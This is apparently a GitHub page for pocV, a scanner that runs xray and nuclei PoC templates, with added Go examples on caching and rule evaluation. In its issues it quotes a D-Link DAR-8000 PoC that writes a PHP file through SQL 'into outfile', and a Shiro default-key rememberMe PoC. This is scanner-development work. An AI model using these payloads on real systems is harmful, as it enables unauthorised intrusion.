
pocV

A PoC scanning framework compatible with both xray V2 PoCs and nuclei templates, written as an assignment for a Zhishixingqiu (知识星球) group.

Features

  • Request caching, so identical requests built by different rules are sent once
  • ceye.io and dnslog.cn as reverse-connection (DNS log) platforms
  • A tag subcommand that adds/removes tags on xray/nuclei PoCs; tags can then be used to filter which PoCs run
  • An update subcommand for self-update
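The request cache in the first feature is only useful if two rules that build the same request actually hit the same cache entry. The Go below is an added example written for this page, not pocV's own cache code: it canonicalizes a request (method, path, lower-cased and sorted headers, body) into a key, serves repeats from a bounded FIFO, and rejects a non-positive size up front instead of letting the cache library panic on it later (the gcache stack trace in the issues further down is what that panic looks like). The `Request`/`Response` types and the fake `send` function are constructed for the example.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sort"
	"strings"
)

// Request carries the fields that decide whether two PoC rules are asking the
// target the same question; anything not in here must not affect the key.
type Request struct {
	Method  string
	Path    string
	Headers map[string]string
	Body    string
}

// Response is whatever the scanner stores for a cached request.
type Response struct {
	Status int
	Body   string
}

// Key canonicalizes a request: method upper-cased, header names lower-cased
// and sorted, so {"Host": .., "Cookie": ..} and {"cookie": .., "host": ..}
// produce the same key.
func Key(r Request) string {
	lower := make(map[string]string, len(r.Headers))
	names := make([]string, 0, len(r.Headers))
	for k, v := range r.Headers {
		lk := strings.ToLower(strings.TrimSpace(k))
		lower[lk] = strings.TrimSpace(v)
		names = append(names, lk)
	}
	sort.Strings(names)
	h := sha256.New()
	fmt.Fprintf(h, "%s\n%s\n", strings.ToUpper(r.Method), r.Path)
	for _, n := range names {
		fmt.Fprintf(h, "%s: %s\n", n, lower[n])
	}
	fmt.Fprintf(h, "\n%s", r.Body)
	return hex.EncodeToString(h.Sum(nil))
}

// Cache is a bounded FIFO of responses keyed by Key (a real scanner would
// pick an LRU/LFU policy; FIFO keeps the example short).
type Cache struct {
	size   int
	order  []string
	items  map[string]Response
	Hits   int
	Misses int
}

// NewCache rejects a non-positive size up front rather than letting it
// surface later as a panic inside the cache library.
func NewCache(size int) (*Cache, error) {
	if size <= 0 {
		return nil, fmt.Errorf("cache size must be positive, got %d", size)
	}
	return &Cache{size: size, items: make(map[string]Response, size)}, nil
}

// Do returns the cached response for r, or sends it with send and stores
// the result, evicting the oldest entry when the cache is full.
func (c *Cache) Do(r Request, send func(Request) Response) Response {
	k := Key(r)
	if resp, ok := c.items[k]; ok {
		c.Hits++
		return resp
	}
	c.Misses++
	resp := send(r)
	if len(c.order) >= c.size {
		delete(c.items, c.order[0])
		c.order = c.order[1:]
	}
	c.items[k] = resp
	c.order = append(c.order, k)
	return resp
}

func main() {
	c, _ := NewCache(16)
	sent := 0
	send := func(r Request) Response { sent++; return Response{Status: 200, Body: "ok"} }
	a := Request{Method: "GET", Path: "/", Headers: map[string]string{"Host": "t", "Cookie": "x=1"}}
	b := Request{Method: "get", Path: "/", Headers: map[string]string{"cookie": "x=1", "host": "t"}}
	c.Do(a, send)
	c.Do(b, send) // same canonical key: served from cache
	c.Do(Request{Method: "GET", Path: "/?id=1"}, send)
	fmt.Printf("sent=%d hits=%d misses=%d\n", sent, c.Hits, c.Misses) // sent=2 hits=1 misses=2
}
```

The body is part of the key on purpose: a rule marked `cache: true` that changes only a POST payload must not be answered from an earlier rule's response.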

Limitations

  • The code has not been heavily tested; it is for learning only

TODO

  • xrayV2 http poc
  • xrayV2 tcp/udp poc
  • nuclei
  • Filter PoCs by tag

Install

From source (GitHub)

# install pocV
git clone --recurse-submodules https://github.com/WAY29/pocV
go build  -ldflags "-w -s" ./cmd/pocV/
# update all pocs
git submodule update --remote --recursive
# self-update
pocV update

From a release

# download releases from https://github.com/WAY29/pocV/releases
# ...
# clone pocs 
git clone https://github.com/projectdiscovery/nuclei-templates && git clone https://github.com/chaitin/xray
# update pocs
cd ./nuclei-templates && git pull && cd ../xray && git pull
# self-update
pocV update

Usage / Quickstart

run

# run single poc
pocV run -t http://example.com -p ./pocs/test/xray/rule_test.yml
# run multiple pocs
pocV run -t http://example.com -P "./pocs/test/nuclei/*"
pocV run -t http://example.com -P "./pocs/nuclei/*"
pocV run -t http://example.com -P "./pocs/xray/pocs/*"
# Specify multiple targets
pocV run -T target.txt -p ./pocs/test/xray/rule_test.yml
# Filter the poc through tags
pocV run -T target.txt --tag test -p "./pocs/test/xray/*"

tag

# add tag
pocV tag -p ./pocs/test/nuclei/tag_test.yml newtag
# remove tag
pocV tag -p ./pocs/test/nuclei/tag_test.yml -r newtag

pocV's People

Contributors

lanyi1998, way29, xinroom


pocV's Issues

Some PoCs fail with "Evalaute expression error"


The content variable fails to parse.

The PoC file is as follows:

name: poc-yaml-dlink-dar8000-importhtml.php-rce
transport: http
set:
  filename: randomLowercase(8)
  # <?php echo md5(114514);?>
  content: select 0x3c3f706870206563686f206d643528313134353134293b3f3e into outfile '/usr/hddocs/nsg/app/{{filename}}.php'
  payload: base64(content)
rules:
  r1:
    request:
      cache: true
      method: GET
      path: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql={{payload}}
      headers: {}
      follow_redirects: false
    expression: |
      response.status==200
  r2:
    request:
      cache: true
      method: GET
      path: /app/{{filename}}.php
      headers: {}
      body: ""
      follow_redirects: false
    expression: |
      response.status==200 && response.body.bcontains(bytes(md5("114514")))
expression: r1() && r2()
detail:
  author: name(link)
  links:
  - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/D-Link/D-Link%20DAR-8000%20importhtml.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  fingerprint:
    infos: []
    host_info:
      hostname: ""
  vulnerability:
    id: ""
    match: ""
  description: ""
  version: ""
  tags: test, test2
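What follows is an added example, not pocV's code and not the issue author's: a Go model of how an xray v2 `set:` block is resolved, using a tiny expression grammar (string literal, variable name, `+` concatenation, `base64(...)`) as a stand-in for CEL. xray's `set:` values are CEL expressions, and this model assumes the same rule, so an unquoted SQL statement in `content:` cannot evaluate: literal text has to be quoted and variables joined with `+`, while `{{name}}` substitution belongs to request fields such as `path`, not to `set:` values. `randomLowercase(8)` is replaced by a fixed literal so the output is deterministic; the grammar, the `identRe`/`tmplRe` regexes and the `EvalSet`/`Render` names are this example's own.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// SetEntry is one "name: expression" line of an xray v2 set: block; entries
// resolve top to bottom, so payload: base64(content) needs content first.
type SetEntry struct{ Name, Expr string }

var (
	identRe = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
	tmplRe  = regexp.MustCompile(`\{\{\s*([A-Za-z_][A-Za-z0-9_]*)\s*\}\}`)
)

// splitTopLevel splits s on sep, ignoring separators inside "..." or (...).
func splitTopLevel(s string, sep byte) []string {
	var parts []string
	depth, quoted, start := 0, false, 0
	for i := 0; i < len(s); i++ {
		switch c := s[i]; {
		case c == '"' && (i == 0 || s[i-1] != '\\'):
			quoted = !quoted
		case quoted: // inside a string literal: no splitting
		case c == '(':
			depth++
		case c == ')':
			depth--
		case c == sep && depth == 0:
			parts, start = append(parts, s[start:i]), i+1
		}
	}
	return append(parts, s[start:])
}

// evalExpr is a tiny stand-in for CEL: "literal", name, a + b and base64(e).
// Anything else, such as a bare SQL statement, is rejected as CEL's parser would.
func evalExpr(expr string, vars map[string]string) (string, error) {
	expr = strings.TrimSpace(expr)
	if parts := splitTopLevel(expr, '+'); len(parts) > 1 {
		var sb strings.Builder
		for _, p := range parts {
			v, err := evalExpr(p, vars)
			if err != nil {
				return "", err
			}
			sb.WriteString(v)
		}
		return sb.String(), nil
	}
	switch {
	case len(expr) >= 2 && expr[0] == '"' && expr[len(expr)-1] == '"':
		return strconv.Unquote(expr)
	case identRe.MatchString(expr):
		if v, ok := vars[expr]; ok {
			return v, nil
		}
		return "", fmt.Errorf("undefined variable %q", expr)
	case strings.HasPrefix(expr, "base64(") && strings.HasSuffix(expr, ")"):
		v, err := evalExpr(expr[len("base64("):len(expr)-1], vars)
		if err != nil {
			return "", err
		}
		return base64.StdEncoding.EncodeToString([]byte(v)), nil
	}
	return "", fmt.Errorf("not an expression (unquoted text?): %q", expr)
}

// EvalSet resolves a set: block in order into a variable map.
func EvalSet(entries []SetEntry) (map[string]string, error) {
	vars := map[string]string{}
	for _, e := range entries {
		v, err := evalExpr(e.Expr, vars)
		if err != nil {
			return nil, fmt.Errorf("set %s: %w", e.Name, err)
		}
		vars[e.Name] = v
	}
	return vars, nil
}

// Render fills {{name}} in a request field (path, header, body); set: values do not get this.
func Render(field string, vars map[string]string) string {
	return tmplRe.ReplaceAllStringFunc(field, func(m string) string {
		if v, ok := vars[tmplRe.FindStringSubmatch(m)[1]]; ok {
			return v
		}
		return m
	})
}

func main() {
	vars, err := EvalSet([]SetEntry{
		{"filename", `"abcdefgh"`}, // randomLowercase(8) in the real PoC
		{"content", `"select 0x3c3f706870206563686f206d643528313134353134293b3f3e into outfile '/usr/hddocs/nsg/app/" + filename + ".php'"`},
		{"payload", "base64(content)"},
	})
	fmt.Println(err, Render("/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql={{payload}}", vars))
}
```

With the original unquoted `content:` line, `EvalSet` stops at `set content: not an expression`, which is the shape of failure the issue reports; with the quoted-and-concatenated form, `payload` becomes the base64 of the finished SQL and `{{payload}}` in `path` renders from it.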

The payloads field is executed repeatedly

Hello author, I'd like to ask about implementing Shiro key detection in an xray PoC.

I added the following function to the CEL implementation:

// shiro: declaration registered with the CEL environment
decls.NewFunction("shirokey",
	decls.NewOverload("shiro_key",
		[]*exprpb.Type{decls.String, decls.String},
		decls.String)),

// shiro: implementation bound to the same overload id
&functions.Overload{
	Operator: "shiro_key",
	Binary: func(key ref.Val, mode ref.Val) ref.Val {
		v1, ok := key.(types.String)
		if !ok {
			return types.ValOrErr(key, "unexpected type '%v' passed to shiro_key", key.Type())
		}
		v2, ok := mode.(types.String)
		if !ok {
			return types.ValOrErr(mode, "unexpected type '%v' passed to shiro_mode", mode.Type())
		}
		// builds the rememberMe cookie for the given key and cipher mode
		cookie := requests.GetShrioCookie(string(v1), string(v2))
		if cookie == "" {
			return types.NewErr("%v", "key b64decode failed")
		}
		return types.String(cookie)
	},
},

The test PoC is as follows:

name: poc-yaml-apache-shiro-key
manual: true
transport: http
set:
  randstr: randomLowercase(8)
  shiromode1: printable("cbc")
  shiromode2: printable("gcm")
payloads:
  continue: false
  payloads:
    s1:
      key: shirokey("kPH+bIxk5D2deZiIxcaaaA==",shiromode1)
    s2:
      key: shirokey("2AvVhdsgUs0FSA3SDFAdag==",shiromode2)
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /
      follow_redirects: false
      headers:
        Cookie: JSESSIONID={{randstr}};rememberMe={{key}}
    expression: |
      !response.headers["Set-Cookie"].contains("rememberMe=")
expression: r0()
detail:
  author: shadown1ng(https://github.com/shadown1ng)

In the end I found that the request for key: shirokey("kPH+bIxk5D2deZiIxcaaaA==",shiromode1) is executed twice, as shown below.

First packet: (image)

Second packet: (image)

Short-circuit logic bug

By short-circuit logic, r1 should not be executed. This causes a large number of meaningless scan requests.

Match when a request header is absent

xray supports writing response.headers["X-Forwarded-For"] == "", but pocV does not. Is there a recommended way to write this, or could it be supported?
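The two issues above (rules being sent eagerly, and matching on an absent header) can be shown together in one added Go example; it is written for this page and is not pocV's code. Rules are closures over constructed fake responses, the `And`/`Or` nodes evaluate the PoC expression with Go's own short-circuit operators so `r1` is never sent once `r0` has failed, `EagerEval` reproduces the wasted request, and `Header` returns `""` for a missing header (case-insensitively), so `Header(resp, "X-Forwarded-For") == ""` expresses what the xray idiom does. The `Scan`, `Call`, `SampleScan` names, the 404/200 responses and the `MARKER` body are this example's own.

```go
package main

import (
	"fmt"
	"strings"
)

// Response is the slice of an HTTP response that rule expressions look at.
type Response struct {
	Status  int
	Headers map[string]string
	Body    string
}

// Rule is one entry of an xray v2 rules: block. Send stands in for the HTTP
// round trip (a constructed fake here), Expr for the rule's expression.
type Rule struct {
	Send func() Response
	Expr func(Response) bool
}

// Scan holds the PoC's rules plus a record of which requests were sent.
type Scan struct {
	Rules   map[string]*Rule
	Order   []string        // declaration order, used by the eager runner
	results map[string]bool // a rule is sent at most once per scan
	Sent    []string
}

// run sends a rule's request on first use and caches its verdict.
func (s *Scan) run(name string) bool {
	if v, ok := s.results[name]; ok {
		return v
	}
	r := s.Rules[name]
	s.Sent = append(s.Sent, name)
	v := r.Expr(r.Send())
	s.results[name] = v
	return v
}

// Expr is the PoC-level expression, e.g. r0() && r1().
type Expr interface{ Eval(*Scan) bool }

type Call string
type And struct{ L, R Expr }
type Or struct{ L, R Expr }

func (c Call) Eval(s *Scan) bool { return s.run(string(c)) }
func (a And) Eval(s *Scan) bool  { return a.L.Eval(s) && a.R.Eval(s) } // Go's && is lazy
func (o Or) Eval(s *Scan) bool   { return o.L.Eval(s) || o.R.Eval(s) }

// LazyEval sends a rule's request only when the expression needs its value.
func LazyEval(s *Scan, e Expr) bool { return e.Eval(s) }

// EagerEval is the behaviour the issue complains about: every rule is sent
// up front, so r1 goes out even when r0 has already failed.
func EagerEval(s *Scan, e Expr) bool {
	for _, name := range s.Order {
		s.run(name)
	}
	return e.Eval(s)
}

// Header mirrors xray's response.headers[name] == "" idiom: a missing header
// reads as "", and the lookup is case-insensitive, as header names are.
func Header(resp Response, name string) string {
	for k, v := range resp.Headers {
		if strings.EqualFold(k, name) {
			return v
		}
	}
	return ""
}

// SampleScan builds a two-rule PoC over constructed responses: r0 is a probe
// that fails (404), r1 the confirmation step that must not be sent after that.
func SampleScan() *Scan {
	probe := Response{Status: 404, Headers: map[string]string{"Server": "nginx"}}
	confirm := Response{Status: 200, Body: "MARKER"}
	return &Scan{
		Order:   []string{"r0", "r1"},
		results: map[string]bool{},
		Rules: map[string]*Rule{
			"r0": {
				Send: func() Response { return probe },
				Expr: func(r Response) bool { return r.Status == 200 && Header(r, "X-Forwarded-For") == "" },
			},
			"r1": {
				Send: func() Response { return confirm },
				Expr: func(r Response) bool { return strings.Contains(r.Body, "MARKER") },
			},
		},
	}
}

func main() {
	e := And{Call("r0"), Call("r1")}
	lazy, eager := SampleScan(), SampleScan()
	fmt.Println("lazy:", LazyEval(lazy, e), lazy.Sent)    // false [r0]
	fmt.Println("eager:", EagerEval(eager, e), eager.Sent) // false [r0 r1]
}
```

Both runners reach the same verdict; the difference is the request count, which is the whole complaint in the short-circuit issue. Note that caching a rule's verdict (`results`) is what makes it safe for a rule name to appear twice in an expression without a second round trip.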

Error while running the program with nuclei or multiple templates

Hey,

Thanks for releasing new tools. However while running pocV, I got the following errors.

[18:14]  WARN No Ceye api, use dnslog.cn
[18:14] DEBUG Load poc file: pocs/nuclei/cves/2020/CVE-2020-26153.yaml
panic: gcache: Cache size <= 0 [recovered]
        panic: gcache: Cache size <= 0

goroutine 1 [running]:
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc000696840, {0x111fe80, 0x18a9900})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:39 +0xa5
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006968a0, {0x111fe80, 0x18a9900})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006c0090, {0x111fe80, 0x18a9900})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).callDo.func1()
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:52 +0x5a
panic({0x111fe80, 0x18a9900})
        /opt/hostedtoolcache/go/1.17.7/x64/src/runtime/panic.go:1038 +0x215
github.com/bluele/gcache.(*CacheBuilder).Build(...)
        /home/runner/go/pkg/mod/github.com/bluele/[email protected]/cache.go:157
github.com/WAY29/pocV/pkg/xray/requests.InitCache(0x23cd080)
        /home/runner/work/pocV/pocV/pkg/xray/requests/cache.go:18 +0xd1
main.cmdRun.func1()
        /home/runner/work/pocV/pocV/cmd/pocV/pocV.go:118 +0x2b3
github.com/jawher/mow.cli/internal/flow.(*Step).callDo(0xc00029fb88, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:55 +0x77
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006c00c0, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:25 +0x31
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006c0060, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc000696870, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc00029fef0, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow%2ecli.(*Cmd).parse(0xc0001bfc00, {0xc00003c090, 0x3, 0x1}, 0x1, 0xc000696870, 0xc0006968a0)
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/commands.go:693 +0x4fa
github.com/jawher/mow%2ecli.(*Cmd).parse(0xc0001bfa00, {0xc00003c080, 0x30, 0x239d500}, 0xc000611b60, 0xc00029fef0, 0xc000696840)
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/commands.go:707 +0x75d
github.com/jawher/mow%2ecli.(*Cli).parse(0xc00063b070, {0xc00003c080, 0x6, 0x6}, 0xc0001bfa00, 0x134055f, 0x9)
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/cli.go:76 +0x9f
github.com/jawher/mow%2ecli.(*Cli).Run(0xc00063b070, {0xc00003c070, 0x7, 0x7})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/cli.go:105 +0x117
main.main()
        /home/runner/work/pocV/pocV/cmd/pocV/pocV.go:151 +0x1e5

False positives in reverse-connection PoCs

There are no false positives on Windows, but on Linux, taking a scan of localhost as an example, these PoCs always match:

(image)
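One way to keep reverse-connection PoCs from matching on noise, as an added Go example that is not pocV's code and does not claim to be the cause of the report above: each probe gets a random token subdomain, and the poll result is parsed and accepted only when a record names exactly that token (or a subdomain of it). The poll body format (a JSON array of `[name, ip, time]` rows, `[]` when nothing was seen), the domain `abcd.dnslog.cn` and the record lines in `main` are constructed for the example; `NaiveHit` is the substring check that fires on any record of the shared domain, shown for contrast.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"strings"
)

// Probe is one reverse-connection check. Each PoC/target pair gets its own
// token, so a lookup caused by another scan (or by someone else using the
// same public dnslog domain) cannot be mistaken for this one.
type Probe struct {
	Token  string
	Domain string // assigned by the platform; "abcd.dnslog.cn" below is assumed
}

// NewProbe draws a fresh 64-bit token from the OS CSPRNG.
func NewProbe(domain string) (Probe, error) {
	b := make([]byte, 8)
	if _, err := rand.Read(b); err != nil {
		return Probe{}, err
	}
	return Probe{Token: hex.EncodeToString(b), Domain: domain}, nil
}

// FQDN is the name planted in the payload: <token>.<domain>.
func (p Probe) FQDN() string { return p.Token + "." + p.Domain }

// NaiveHit is the check that produces false positives: any record on the
// shared domain, including ones left by other scans, counts as a hit.
func NaiveHit(p Probe, pollBody string) bool {
	return strings.Contains(strings.ToLower(pollBody), strings.ToLower(p.Domain))
}

// Hit parses the poll result (assumed format: JSON array of [name, ip, time]
// rows, "[]" when empty) and reports true only for a row whose name is this
// probe's FQDN or a subdomain of it. A body that is not JSON is an error,
// never a hit.
func (p Probe) Hit(pollBody string) (bool, error) {
	var rows [][]string
	if err := json.Unmarshal([]byte(pollBody), &rows); err != nil {
		return false, fmt.Errorf("unexpected poll body %q: %w", pollBody, err)
	}
	want := strings.ToLower(p.FQDN())
	for _, row := range rows {
		if len(row) == 0 {
			continue
		}
		name := strings.ToLower(strings.TrimSuffix(row[0], "."))
		if name == want || strings.HasSuffix(name, "."+want) {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	p := Probe{Token: "deadbeef01234567", Domain: "abcd.dnslog.cn"}
	// Constructed poll bodies: nothing seen, another scan's record, our record.
	for _, body := range []string{
		`[]`,
		`[["cafe0000.abcd.dnslog.cn","203.0.113.5","2022-01-01 00:00:00"]]`,
		`[["DEADBEEF01234567.abcd.dnslog.cn.","203.0.113.5","2022-01-01 00:00:01"]]`,
	} {
		hit, err := p.Hit(body)
		fmt.Printf("naive=%v strict=%v err=%v\n", NaiveHit(p, body), hit, err)
	}
}
```

The second constructed body is the interesting one: the naive check reports a hit for a record that belongs to some other scan, the strict check does not. Treating a non-JSON poll body (a login page, an error page) as an error rather than a hit closes another route to a constant false positive.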
